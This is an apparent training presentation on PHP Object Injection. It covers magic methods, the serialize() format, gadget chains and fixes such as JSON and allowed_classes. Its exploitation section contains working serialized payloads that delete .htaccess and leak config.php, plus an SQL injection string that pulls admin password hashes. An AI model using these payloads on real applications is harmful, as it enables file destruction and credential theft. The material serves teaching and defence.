A deep dive into PHP Object Injection Ionut Popescu.

Contents Part 1: Background information Part 2: Vulnerability exploitation Part 3: Demo

Vulnerability description “PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.” - OWASP

Vulnerable software (applications that have had PHP Object Injection bugs): WordPress, Magento, Joomla, IP Board, Dotclear, OpenCart, CubeCart, Drupal 7.34, vBulletin, Tuleap, Moodle, WHMCS

Part 1: Background information

Classes in PHP

PHP Magic Methods (called implicitly by the engine, never directly by the application): __construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toString(), __invoke(), __set_state(), __clone(), __debugInfo()

Magic methods example Output: __construct This is a string __toString __destruct

Magic methods example #2 Output: Get: Data Set: RHOST = Call: run Invoke: shell
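The two example slides above show only the output of their code. The following is an added example, not the code from the slides, that implements the magic methods those outputs correspond to in one class; the class name Target, the private $data array and the values passed in are assumptions, and the comments name the method each statement triggers.

```php
<?php
// Added example (not from the slides): one class that implements the magic
// methods exercised on the two "Magic methods example" slides. The class name,
// the $data backing array and the argument values are assumptions.
class Target
{
    private array $data = [];

    public function __construct()
    {
        echo "__construct\n";
    }

    public function __destruct()
    {
        echo "__destruct\n";
    }

    // Triggered when the object is used in string context (echo, concatenation).
    public function __toString(): string
    {
        echo "__toString\n";
        return "This is a string";
    }

    // Triggered on read of an inaccessible or undefined property.
    public function __get($name)
    {
        echo "Get: $name\n";
        return $this->data[$name] ?? null;
    }

    // Triggered on write to an inaccessible or undefined property.
    public function __set($name, $value)
    {
        echo "Set: $name = $value\n";
        $this->data[$name] = $value;
    }

    // Triggered when an undefined (or inaccessible) method is called.
    public function __call($name, array $args)
    {
        echo "Call: $name\n";
        return null;
    }

    // Triggered when the object itself is called like a function.
    public function __invoke($arg)
    {
        echo "Invoke: $arg\n";
        return null;
    }
}

$t = new Target();           // __construct
echo $t . "\n";              // __toString (string context)
$t->Data;                    // __get: the property does not exist
$t->RHOST = '127.0.0.1';     // __set: the property does not exist
$t->run();                   // __call: the method does not exist
$t('shell');                 // __invoke
// $t is released at script end, which is when __destruct runs.
```

The point for what follows: none of these methods is called by name anywhere in the script. The engine calls them as a side effect of how an object is used, so an attacker who controls which class an object has, and what its properties contain, controls which code runs when the application echoes, indexes, calls or destroys that object.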

Object serialization. serialize() generates a storable string representation of a value. Formats: String s:size:"value"; Integer i:value; Boolean b:value; (stores 1 or 0, never the words true/false) Null N; Array a:size:{key definition;value definition;(repeated per element)} Object O:strlen(class name):"class name":property count:{s:strlen(property name):"property name";property definition;(repeated per property)}

Serialization example Output: s:5:"OWASP"; O:8:"stdClass":0:{} b:1; a:3:{i:0;i:1;i:1;i:2;i:2;i:3;} O:8:"stdClass":0:{}

Serialization example #2 User John is 20 years old. O:4:"User":2: { s:3:"age";i:20; s:4:"name";s:4:"John"; }

unserialize “magic” If the serialized string describes an object, unserialize() will: 1. Create an instance of the named class and fill in the stored property values, without calling __construct. 2. Call __wakeup() if the class defines it (on PHP 7.4 and later, __unserialize() takes precedence when present). 3. Call __destruct() when the object is destroyed, i.e. as soon as its last reference goes away and at the latest at script end. Any other magic method (__toString, __get, __call, ...) runs only if the application later uses the object in a way that triggers it.

Unserialize example Output: __construct __sleep Serialized: O:4:"Test":2:{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";} __wakeup BUZZ __destruct
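The serialization slides and the unserialize example above show output without the code that produced it. The following added example, not code from the slides, prints the serialized form of the scalar, array and object values from the "Serialization example" slide and then runs a Test class through serialize()/unserialize() so the __sleep/__wakeup/__destruct sequence is visible; the class body is an assumption chosen to match the slide's serialized string.

```php
<?php
// Added example (not from the slides). Test's properties are chosen so that
// serialize() yields the string shown on the "Unserialize example" slide.
class Test
{
    public $variable  = 'BUZZ';
    public $variable2 = 'OTHER';

    public function __construct()
    {
        echo "__construct\n";
    }

    // Called by serialize(): returns the names of the properties to store.
    public function __sleep(): array
    {
        echo "__sleep\n";
        return ['variable', 'variable2'];
    }

    // Called by unserialize() once the object has been rebuilt from the string.
    // __construct is NOT called on this path.
    public function __wakeup(): void
    {
        echo "__wakeup\n";
        echo $this->variable . "\n";
    }

    public function __destruct()
    {
        echo "__destruct\n";
    }
}

// Scalars, an array and an object, as on the "Serialization example" slide.
$samples = ['OWASP', new stdClass(), true, [1, 2, 3], null];
foreach ($samples as $value) {
    echo serialize($value) . "\n";
}

// Object round trip: __construct and __sleep on the original, __wakeup on the copy.
$original = new Test();
$blob = serialize($original);
echo "Serialized: $blob\n";
$copy = unserialize($blob);
// Both $original and $copy are released at script end: __destruct runs twice.
```

Note where the lengths in the string come from: s:8:"variable" is the property name and its strlen, O:4:"Test":2 is the class name, its strlen and the property count. When a payload is written by hand, every length must match the bytes that follow it, otherwise unserialize() returns false and nothing is instantiated.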

Part 2: Vulnerability exploitation

PHP Object Injection An application is exploitable when 1. it calls unserialize() on user-supplied data, 2. classes exist that implement __destruct, __wakeup or another method which does something useful to an attacker when the object's properties are attacker-controlled (a "gadget"), and 3. those classes are defined, or can be loaded, at the moment unserialize() runs (an autoloader registered with spl_autoload_register() loads them on demand, which widens the set of usable classes).

Vulnerable code example

Exploitation Normal call: script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";} Exploit: serialize a LogFile object whose filename property is ".htaccess"; its __destruct will delete that file. Payload: O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";} Call: script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";} Result: __destruct deletes the ".htaccess" file.
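The vulnerable code slide is an image, so the script is not on this page. The following is an added reconstruction, not the slide's code: the User and LogFile class names and the usr_serialized parameter follow the slide, while LogFile's log() method, the handle() function standing in for the request handler, and the use of a temporary file in place of the real .htaccess are assumptions so that the whole thing runs offline and shows the file actually disappearing.

```php
<?php
// Added example, not the code from the slide. Names follow the slide; the
// log() method, handle() and the temp-file stand-in for .htaccess are assumptions.

class User
{
    public $age;
    public $name;
}

// Legitimate class somewhere in the application: it appends to a log file and
// removes the file in its destructor. Nothing here is a bug on its own.
class LogFile
{
    public $filename = 'error.log';

    public function log(string $msg): void
    {
        file_put_contents($this->filename, $msg . "\n", FILE_APPEND);
    }

    public function __destruct()
    {
        echo "__destruct deletes \"{$this->filename}\"\n";
        @unlink($this->filename);
    }
}

// The vulnerable sink. In the real script $input is $_GET['usr_serialized'].
function handle(string $input): void
{
    $usr = unserialize($input);   // instantiates whatever class the string names
    if ($usr instanceof User) {
        echo "User {$usr->name} is {$usr->age} years old.\n";
    } else {
        $what = is_object($usr) ? get_class($usr) : gettype($usr);
        echo "Unexpected input of type $what\n";
    }
    // $usr goes out of scope on return: LogFile::__destruct runs with OUR filename.
}

// Normal input, as the application expects it.
$john = new User();
$john->age = 20;
$john->name = 'John';
handle(serialize($john));   // O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}

// Attacker input. The string is written by hand rather than with serialize(),
// because creating a LogFile object here would fire its destructor as well.
$victim = sys_get_temp_dir() . '/.htaccess';     // stand-in for the web root's .htaccess
file_put_contents($victim, "Deny from all\n");
$payload = sprintf('O:7:"LogFile":1:{s:8:"filename";s:%d:"%s";}', strlen($victim), $victim);

echo "Payload: $payload\n";
echo "Before: " . (file_exists($victim) ? 'present' : 'deleted') . "\n";
handle($payload);
echo "After:  " . (file_exists($victim) ? 'present' : 'deleted') . "\n";
```

Two things worth noticing. The instanceof check in handle() does not help: the gadget is already instantiated by the time the check runs, and its destructor fires regardless of which branch was taken. And the attacker never needs LogFile to be loaded on their side; only the target has to have the class available when unserialize() runs.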

Vulnerable code example #2

Exploitation #2 Normal call: script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";} Exploit: serialize a FileClass object whose __toString reads the file named in its filename property, here "config.php". Payload: O:9:"FileClass":1:{s:8:"filename";s:10:"config.php";} Call: script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php";} Result: when the script uses the object in string context, __toString reads config.php and its contents end up in the page output.
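As with the first example, the vulnerable code slide is an image. The following added reconstruction, not the slide's code, shows the __toString vector: the script concatenates the unserialized object into a string, so whatever class arrived has its __toString called. The User::__toString method, the handle() wrapper and the constructed temporary config.php are assumptions; FileClass and the payload follow the slide.

```php
<?php
// Added example, not the code from the slide. FileClass follows the slide;
// User::__toString, handle() and the temporary config.php are assumptions.

class User
{
    public $age;
    public $name;

    public function __toString(): string
    {
        return "User {$this->name} is {$this->age} years old.";
    }
}

// Legitimate helper class elsewhere in the code base: renders a file's
// contents when used as a string (think of a template include).
class FileClass
{
    public $filename = 'template.html';

    public function __toString(): string
    {
        return (string) @file_get_contents($this->filename);
    }
}

// Vulnerable sink. In the real script $input is $_GET['usr_serialized'].
function handle(string $input): string
{
    $usr = unserialize($input);
    // String context: PHP calls __toString() of whatever class was injected.
    return "Profile: " . $usr . "\n";
}

$john = new User();
$john->age = 20;
$john->name = 'John';
echo handle(serialize($john));

// Constructed secret file standing in for the application's config.php.
$secret = sys_get_temp_dir() . '/config.php';
file_put_contents($secret, "<?php\n\$db_user = 'app';\n\$db_pass = 's3cret';\n");

$payload = sprintf('O:9:"FileClass":1:{s:8:"filename";s:%d:"%s";}', strlen($secret), $secret);
echo "Payload: $payload\n";
echo handle($payload);   // the file's contents come back in the response
unlink($secret);
```

Unlike the __destruct vector, this one needs the application to do something with the object after unserialize(): echo it, concatenate it, pass it to a function that expects a string. Any of those is enough, and the attacker does not need the injected class to be related to User in any way.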

Other exploitation vectors: other magic methods (__get, __set, __call, __toString, ...) that the application triggers on the unserialized object; and ordinary methods whose name collides across classes. E.g. the script calls $usr->getData() expecting User::getData(), but the injected object is a Database, so Database::getData() runs instead, with the query built from attacker-controlled properties.
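The method-name collision is easy to miss in a code review because nothing magic is involved. The following added example, not the slide's code, shows it: both User and Database (assumed classes) define getData(), the script calls it on whatever unserialize() returned, and the Database version builds its query from its own properties. The query is only returned, not executed, so the example runs without a database.

```php
<?php
// Added example, not the code from the slide. User, Database and handle() are
// assumptions; the SQL is built and returned, never executed.

class User
{
    public $name;

    public function getData(): string
    {
        return "name={$this->name}";
    }
}

// Unrelated class in the same code base that happens to use the same method name.
class Database
{
    public $table = 'users';
    public $where = '1=1';

    // In the real application the string would go to mysqli/PDO.
    public function getData(): string
    {
        return "SELECT * FROM {$this->table} WHERE {$this->where}";
    }
}

function handle(string $input): string
{
    $obj = unserialize($input);
    // Resolved at run time on the object's real class: Database::getData()
    // if a Database was injected. No magic method is involved.
    return $obj->getData();
}

echo handle('O:4:"User":1:{s:4:"name";s:4:"John";}') . "\n";

// Attacker side. Database has no destructor or other side effects, so
// serialising a real instance here is harmless.
$gadget = new Database();
$gadget->where = "1=0 UNION SELECT login, password_hash FROM admins";
$payload = serialize($gadget);
echo "Payload: $payload\n";
echo handle($payload) . "\n";   // query text is now attacker-controlled
```

When hunting for gadgets, grep for the method names the application calls on unserialized objects, not only for __destruct and __wakeup: every class that defines a method of that name is a candidate, and the more classes an autoloader can reach, the longer that list gets.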

How to fix? Never pass user-supplied data to unserialize(). Exchange data as JSON and rebuild objects yourself: json_decode() yields only arrays and stdClass, never an application class, so no __wakeup, __destruct or __toString of your code can be reached. If serialized data from an untrusted source cannot be avoided, pass ['allowed_classes' => false] (PHP 7.0 and later) so that no application class is instantiated.
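The following added example, not the slide's code, shows the hardened version of the script from the exploitation slides: a User is rebuilt from JSON after explicit validation, and a second function shows unserialize() with allowed_classes disabled as the fallback for legacy data. The User constructor, the field checks and the sample inputs are assumptions; the code needs PHP 8 for constructor promotion.

```php
<?php
// Added example, not the code from the slide. User and the validation rules
// are assumptions; requires PHP 8 (constructor property promotion).

class User
{
    public function __construct(public string $name, public int $age) {}
}

// Safe path: JSON carries only data, and the application decides what to build.
// json_decode() never instantiates application classes, so no magic method of
// any gadget class can be reached from here.
function userFromJson(string $json): ?User
{
    try {
        $d = json_decode($json, true, 512, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        return null;   // malformed input is rejected, not "repaired"
    }
    if (!is_array($d)
        || !isset($d['name'], $d['age'])
        || !is_string($d['name']) || $d['name'] === ''
        || !is_int($d['age']) || $d['age'] < 0) {
        return null;
    }
    return new User($d['name'], $d['age']);
}

// Fallback for serialized data you cannot migrate yet: refuse objects outright.
// With allowed_classes=false every O:... entry becomes __PHP_Incomplete_Class,
// which has no __wakeup/__destruct/__toString of yours to run.
function dataOnly(string $blob)
{
    return unserialize($blob, ['allowed_classes' => false]);
}

var_dump(userFromJson('{"name":"John","age":20}'));     // User object
var_dump(userFromJson('{"name":"John","age":"20"}'));   // NULL: age is a string
var_dump(userFromJson('{"name":"John"'));               // NULL: malformed JSON

// The LogFile payload from the exploitation slide is neutralised:
$x = dataOnly('O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}');
var_dump($x instanceof __PHP_Incomplete_Class);          // bool(true)
```

Two caveats. allowed_classes only blocks instantiation; if the application later re-serializes the incomplete object and unserializes it somewhere else without the option, the gadget comes back, so treat it as a stopgap rather than a fix. And json_decode() only helps if the decoded data is used as data: code like new $d['class'] or call_user_func($d['callback']) reintroduces the same problem through a different parser. Where serialized blobs genuinely have to cross a trust boundary (a cookie, a hidden form field), sign them with hash_hmac() and verify the signature before calling unserialize().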

Part 3: Demo

IP Board – Vulnerable code /admin/sources/base/core.php:

IP Board - Exploitation /ips_kernel/classDb.php:

IP Board – Public exploit


Questions? Thank you, Ionut Popescu